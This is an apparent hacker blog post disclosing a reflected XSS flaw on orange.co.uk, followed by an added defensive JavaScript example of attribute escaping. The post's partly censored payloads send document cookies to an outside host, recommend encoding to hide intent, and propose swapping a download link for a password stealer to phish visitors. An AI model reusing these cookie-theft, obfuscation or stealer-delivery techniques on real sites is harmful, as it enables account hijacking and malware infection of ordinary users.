Wednesday, February 1, 2012

TinKode-Orange Vulnerable to XSS and phishing



Posted by isrtinkode on February 19, 2010
                       ____                               _    _ _  __
                      / __ \                             | |  | | |/ /
                     | |  | |_ __ __ _ _ __   __ _  ___  | |  | | ' /
                     | |  | | '__/ _` | '_ \ / _` |/ _ \ | |  | |  <
                     | |__| | | | (_| | | | | (_| |  __/ | |__| | . \
                      \____/|_|  \__,_|_| |_|\__, |\___|  \____/|_|\_\
                                              __/ |
                                             |___/
                                            # TinKode & La Magra@ Romania
XSS – [Cross-Site Scripting]
Information:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy…
More here: [ XSS ]
I just found an XSS vulnerability in the website.orange.co.uk website.
Through this vulnerability, an attacker could inject HTML or JavaScript code which may lead to cookie stealing.
Proof of Concept:

Link:
http://censored/index.php?module=censored=">censored  src=javascript:censored="http://censored?censored="+document.censored+"&censored")></censored>
c0de:
"><censored" src=javascript:censored="http://censored.site.com/censored.php?censored="+document.censored>
We can encode the malicious code in base64, hex, etc. in order to hide our intentions! :)
Another example for this vulnerability is phishing! :D
As everyone knows, there are programs called stealers which can steal all saved passwords from your browser.
I picked an executable program (winamp in our case) for a demonstration.
Link to download winamp: http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe
The malicious code:
"><censored  src="http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe">censored
Encoded in hex will become:

http://website.orange.co.uk/censored
Replace the winamp link with another one (e.g. a stealer) and you can trick a lot of people.
Note: This isn’t the only vulnerability which I found in orange.co.uk
#Tinkode
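
The flaw described in this post is a request parameter reflected into a quoted HTML attribute without output encoding. The following is an added example, not part of the original post and not the site's code: it puts the vulnerable rendering pattern next to an attribute-encoded one and shows that a hex-encoded link reaches the handler as the same decoded value, so the encoding has to be applied at output. Only the `module` parameter name comes from the URL above; the template, function names and probe string are assumptions constructed for the demonstration.

```javascript
// Added example. The template, function names and probe string are constructed;
// only the `module` parameter name comes from the URL in the post.
const ATTR_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode every character that can end a quoted attribute value or start a tag.
function escapeAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ATTR_ESCAPES[ch]);
}

// Vulnerable pattern: the decoded parameter is concatenated into the attribute.
function renderUnsafe(moduleParam) {
  return '<input type="hidden" name="module" value="' + moduleParam + '">';
}

// Hardened pattern: same template, value encoded for the attribute context.
function renderSafe(moduleParam) {
  return '<input type="hidden" name="module" value="' + escapeAttr(moduleParam) + '">';
}

// Second layer: a module name has no reason to contain markup, so allow-list it.
function isValidModule(moduleParam) {
  return /^[A-Za-z0-9_-]{1,32}$/.test(moduleParam);
}

// Count elements in rendered markup; the template is meant to produce exactly one.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// URLSearchParams percent-decodes the query the way a server-side framework does,
// so the handler sees the same value whether or not the link was hex-encoded.
function handle(rawQuery) {
  const moduleParam = new URLSearchParams(rawQuery).get('module') ?? '';
  return {
    unsafeTags: countTags(renderUnsafe(moduleParam)),
    safeHtml: renderSafe(moduleParam),
    safeTags: countTags(renderSafe(moduleParam)),
    accepted: isValidModule(moduleParam),
  };
}

// Constructed, harmless probe: a bold tag after an attribute break-out.
const PLAIN = 'module="><b>probe</b>';
const HEX = 'module=%22%3E%3C%62%3E%70%72%6F%62%65%3C%2F%62%3E';
console.log(handle(PLAIN), handle(HEX), handle('module=news'));
```

With the unsafe template both forms of the probe produce a second element in the page; with the encoded template the output stays a single `input` element and the probe appears only as inert text in its value.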
